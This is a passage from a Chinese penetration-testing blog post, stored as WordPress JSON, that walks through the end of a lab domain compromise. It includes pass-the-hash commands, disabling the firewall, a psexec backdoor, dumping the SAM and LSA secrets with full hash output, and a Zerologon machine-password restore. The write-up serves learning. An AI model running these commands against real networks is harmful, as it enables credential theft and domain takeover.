\/><\/figure>\n\n\n\n<p>\u7136\u540e\u5173\u6389\u9632\u706b\u5899<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python wmiexec-pro.py -hashes aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d vsmoon\/Administrator@10.10.10.137 exec-command -command \"netsh advfirewall set allprofiles state off\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"971\" height=\"315\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-164.png\" alt=\"\" class=\"wp-image-719\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-164.png 971w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-164-300x97.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-164-768x249.png 768w\" sizes=\"auto, (max-width: 971px) 100vw, 971px\" \/><\/figure>\n\n\n\n<p>PTH\u8fde\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pth vsmoon\\Administrator 66120f7b66195b694faeabc4e3b6752d<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"681\" height=\"530\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-167.png\" alt=\"\" class=\"wp-image-722\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-167.png 681w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-167-300x233.png 300w\" sizes=\"auto, (max-width: 681px) 100vw, 681px\" \/><\/figure>\n\n\n\n<p>\u6b63\u5411\u4f20\u9a6c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"460\" height=\"474\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-165.png\" alt=\"\" class=\"wp-image-720\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-165.png 460w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-165-291x300.png 291w\" sizes=\"auto, (max-width: 460px) 100vw, 460px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u5728PTH\u8fde\u63a5\u540e\u7684\u9a6c\u5b50\u4e2d\u4f20\u5165\u540e\u95e8\uff1a\njump psexec64 10.10.10.137 ZX<\/code><\/pre>\n\n\n\n<p>\u4e0a\u7ebf\u6210\u529f<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"906\" height=\"319\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-168.png\" alt=\"\" class=\"wp-image-723\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-168.png 906w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-168-300x106.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-168-768x270.png 768w\" sizes=\"auto, (max-width: 906px) 100vw, 906px\" \/><\/figure>\n\n\n\n<p>\u8001\u6837\u5b50\uff0c\u6536\u5c3e\u5de5\u4f5c<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>shell reg save HKLM\\SYSTEM c:\\Users\\Administrator\\system.save\nshell reg save HKLM\\SAM c:\\Users\\Administrator\\sam.save\nshell reg save HKLM\\SECURITY c:\\Users\\Administrator\\security.save<\/code><\/pre>\n\n\n\n<p>\u4e0b\u8f7d\u4e0b\u6765<\/p>\n\n\n\n<p>\u672c\u5730\u6293\u4e00\u6b21<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>secretsdump.exe -sam sam.save -system system.save -security security.save LOCAL<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"965\" height=\"489\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-169.png\" alt=\"\" class=\"wp-image-725\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-169.png 965w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-169-300x152.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-169-768x389.png 768w\" sizes=\"auto, (max-width: 965px) 100vw, 965px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>&#91;*] Target system bootKey: 0xb34b17556cade716de1f36076e43efdb\n&#91;*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:a711c97a7551203389aaed828a12d896:::\n&#91;*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)\n&#91;*] Dumping LSA Secrets\n&#91;*] $MACHINE.ACC\n$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1107cbbbb24ece79735df966cf75525d\n&#91;*] DefaultPassword\n(Unknown User):ROOT#123\n&#91;*] DPAPI_SYSTEM\n 0000   01 00 00 00 F7 62 02 24  A6 6B 0B 07 CC 3E 0B 45   .....b.$.k...>.E\n 0010   26 3C 52 AA 64 3A 0C FE  4F D6 A5 52 1F D0 1D 1B   &amp;&lt;R.d:..O..R....\n 0020   B0 47 84 3E D1 41 84 0A  B2 60 31 80               .G.>.A...`1.\nDPAPI_SYSTEM:01000000f7620224a66b0b07cc3e0b45263c52aa643a0cfe4fd6a5521fd01d1bb047843ed141840ab2603180\n&#91;*] NL$KM\n 0000   A3 1B 0C 50 A7 32 09 2A  43 02 DD DA 2B 89 B4 FD   ...P.2.*C...+...\n 0010   AA 4C BD 16 91 F8 C7 D5  A1 F1 26 F3 6A CD A4 00   .L........&amp;.j...\n 0020   0E 06 AC FF 45 88 79 C6  EF B6 1C 87 9F A5 C0 C0   ....E.y.........\n 0030   72 C0 D7 32 48 A1 A7 10  F0 40 50 9F A3 92 BE 34   r..2H....@P....4\nNL$KM:a31b0c50a732092a4302ddda2b89b4fdaa4cbd1691f8c7d5a1f126f36acda4000e06acff458879c6efb61c879fa5c0c072c0d73248a1a710f040509fa392be34\n&#91;*] Cleaning up...<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>NTLM\uff1a1107cbbbb24ece79735df966cf75525d<\/code><\/pre>\n\n\n\n<p>\u6302\u4e0a\u4ee3\u7406\uff0c\u8fd8\u539fhash<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python reinstall_original_pw.py ad 10.10.10.137 1107cbbbb24ece79735df966cf75525d<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"970\" height=\"455\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-170.png\" alt=\"\" class=\"wp-image-729\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-170.png 970w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-170-300x141.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-170-768x360.png 768w\" sizes=\"auto, (max-width: 970px) 100vw, 970px\" \/><\/figure>\n\n\n\n<p>\u9a8c\u8bc1\u4e00\u904d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>secretsdump.exe vsmoon\/AD$@10.10.10.137 -no-pass<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"973\" height=\"140\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-171.png\" alt=\"\" class=\"wp-image-730\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-171.png 973w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-171-300x43.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-171-768x111.png 768w\" sizes=\"auto, (max-width: 973px) 100vw, 973px\" \/><\/figure>\n\n\n\n<p>\u7ed3\u675f\uff01<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5c0f\u603b\u7ed3<\/h2>\n\n\n\n<p>    \u8fd9\u4e2a\u9776\u573a\u7a0d\u5fae\u5b66\u4e86\u4e00\u4e9b\u4ee3\u7801\u5ba1\u8ba1\uff0c\u719f\u6089\u4e86\u4e00\u4e0b\u57df\u6a2a\u5411\uff0c\u76ee\u524d\u611f\u89c9\uff0c\u9776\u573a\u62ff\u57df\u63a7\u57fa\u672c\u4e0a\u90fd\u662f2020-1472\uff0c\u4e0d\u77e5\u9053\u4e0b\u4e00\u4e2a\u9776\u573a\u4f1a\u4e0d\u4f1a\u6709\u6539\u53d8<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5f00\u65b0\u7bc7\u7ae0\uff0c\u8df3\u8fc7\u642d\u5efa\uff0c\u7b80\u5355\u4ecb\u7ecd\u4e00\u4e0b webIP\uff1a192.168.0.102 WEB\u90e8\u5206 \u5148\u4e0agoby\u626b\u4e00\u626b 16 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-611","post","type-post","status-publish","format-standard","hentry","category-shentouceshi"],"_links":{"self":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/comments?post=611"}],"version-history":[{"count":58,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/611\/revisions"}],"predecessor-version":[{"id":731,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/611\/revisions\/731"}],"wp:attachment":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/media?parent=611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/categories?post=611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/tags?post=611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}